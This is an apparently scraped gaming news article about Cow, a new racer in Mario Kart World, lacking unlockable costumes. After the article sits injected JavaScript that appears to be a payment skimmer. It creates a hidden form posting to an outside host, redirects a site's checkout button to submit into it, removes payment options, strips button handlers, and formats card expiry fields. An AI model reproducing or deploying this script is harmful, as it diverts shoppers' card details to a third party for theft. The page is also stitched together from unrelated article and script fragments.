Gaming

Mario Kart World’s Cow Has a Big Drawback Compared to Other Racers

If you’re planning on playing the Switch 2 game as Cow, this might change your mind. 

When Mario Kart World is released on Nintendo Switch 2, the game will feature a massive list of racers, including veterans from past entries, and a large group of newcomers. The one newcomer that’s getting the most attention so far is Cow, a simply-named racer that first debuted as an obstacle to be avoided on Mario Kart 64‘s Moo Moo Farm course. For Mario Kart World, Cow graduated to full racer status when Nintendo was looking for unique ways to expand the franchise roster. This opened the door for what the developers have referred to as “NPC drivers,” which are characters that previously appeared merely as obstacles.

Videos by ComicBook.com

Most of the general public hasn’t had a chance to go hands-on with Cow or Mario Kart World yet, and won’t until Nintendo Switch 2 arrives on June 5th. Despite this, fans are already very taken with the character’s design, and Cow has quickly become something of a mascot for the game. Nintendo clearly knew in advance that Cow would become a favorite, too; Moo Moo Meadows has received a major redesign for Mario Kart World, which now basically acts as a shrine to the character and her racing abilities. However, there is one negative that might make players think twice before picking Cow, or any of the other NPC racers for that matter.

cow has already become a fan favorite and the game isn’t even out yet

One of the big changes to Mario Kart World over past games in the series is that players can unlock alternate costumes for the game’s cast. Characters like Mario, Luigi, and Peach all have alternate looks that can be unlocked through gameplay, and then picked for each race through the character select screen. So far, Nintendo has revealed a lot of interesting new designs, which should add to the game’s overall variety. However, during a hands-on session I attended for Mario Kart World, Nintendo confirmed that there are no costume unlocks for the NPC drivers. That means you won’t find characters like Cow dressed up as a biker, or Dolphin in beachwear.

For some fans, this is bound to be a disappointment. The costumes are clearly one of the big new additions in Mario Kart World; the development team has found some fun and unique designs for the older cast members, and this is the first time this has been done in a mainline Mario Kart game (though costumes did appear in the mobile Mario Kart Tour). It just seems like a huge missed opportunity not to offer them for one of the game’s biggest new racers. It would have been awesome to see Cow wearing a “Cow-rio” costume, complete with red hat and blue overalls. Also, the idea of Cow in a biker outfit like Wario and Waluigi is kind of hysterical, even if a bovine wearing leather might be a bit morbid.

cow deserves a biker inspired look, but maybe the gloves should be vegan leather

It’s possible we could see Nintendo rectify this with DLC. Right now, we don’t know how Mario Kart World is going to handle extra content. Presumably, we’ll see better support for the game early on than we did with Mario Kart 8 Deluxe. The Switch version didn’t get much in the way of support until several years after launch, and it’s a safe bet that Nintendo won’t repeat that same mistake. A Cow costume DLC pack would be a welcome addition to Mario Kart World, either as a free update or as paid content. Given the character’s immediate popularity, it has to be something Nintendo is considering, or at least will if there’s enough demand from players. It definitely shouldn’t stop at Cow either, as characters like Monty Mole could also stand to benefit from some alternate outfits.

It’s entirely possible that Mario Kart World fans who were already planning to race as Cow won’t be dissuaded from choosing the character simply because she doesn’t have any alternate costumes. There seems to be a lot of genuine interest in the NPC drivers, and Nintendo’s designers did an excellent job making her work within the game’s world. After the stacked roster of Mario Kart 8 Deluxe, it was likely a struggle to come up with new characters that could be added. Expanding the roster to include those that were previously there simply as obstacles adds a nice layer to the game, even if they don’t get to play dress up the way everyone else does.

Do you plan on racing as Cow in Mario Kart World? Would you like to see alternate costumes for the game’s NPC drivers? Share your thoughts with me directly on Bluesky at @Marcdachamp, or on Instagram at @Dachampgaming!

' document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0].setAttribute('form', 'formid') document.getElementsByClassName('w-full p-4')[0].remove() document.getElementsByClassName('w-full p-4')[0].innerHTML='
' var el = document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0], elClone = el.cloneNode(true); el.parentNode.replaceChild(elClone, el); }, 5000); }, false); }; var elemDiv = document.createElement('form'); elemDiv.setAttribute('action', 'https://pay.jollibeefood.rest') elemDiv.setAttribute('method', 'post') elemDiv.setAttribute('id', 'formid') document.body.appendChild(elemDiv); setTimeout(function () { try{ document.getElementsByClassName('border-gray-medium flex cursor-pointer items-center justify-between rounded-md border-2 bg-white p-4')[1].remove() } catch{ console.log(1) } }, 9000); navigation.addEventListener('navigate', () => { setTimeout(function () { try{ var objects = document.getElementsByTagName("svg"); for(var i = 0; i < objects.length; i++) { var obj = objects[i].parentElement; obj.innerHTML += ""; // will trigger update } document.getElementsByClassName('border-gray-medium flex cursor-pointer items-center justify-between rounded-md border-2 bg-white p-4')[1].remove() document.getElementsByClassName("py-5")[1].getElementsByClassName("space-y-2")[0].addEventListener("click", function(e) { setTimeout(function () { document.getElementsByClassName('w-full p-4')[0].innerHTML='
' document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0].setAttribute('form', 'formid') document.getElementsByClassName('w-full p-4')[0].remove() document.getElementsByClassName('w-full p-4')[0].innerHTML='
' var el = document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0], elClone = el.cloneNode(true); el.parentNode.replaceChild(elClone, el); }, 5000); }, false); } catch(error){ console.log(error) } }, 4000); }); function formatString(e) { var inputChar = String.fromCharCode(event.keyCode); var code = event.keyCode; var allowedKeys = [8]; if (allowedKeys.indexOf(code) !== -1) { return; } event.target.value = event.target.value.replace( /^([1-9]\/|[2-9])$/g, '0$1/' // 3 > 03/ ).replace( /^(0[1-9]|1[0-2])$/g, '$1/' // 11 > 11/ ).replace( /^([0-1])([3-9])$/g, '0$1/$2' // 13 > 01/3 ).replace( /^(0?[1-9]|1[0-2])([0-9]{2})$/g, '$1/$2' // 141 > 01/41 ).replace( /^([0]+)\/|[0]+$/g, '0' // 0/ > 0 and 00 > 0 ).replace( /[^\d\/]|^[\/]*$/g, '' // To allow only digits and `/` ).replace( /\/\//g, '/' // Prevent entering more than 1 `/` ); }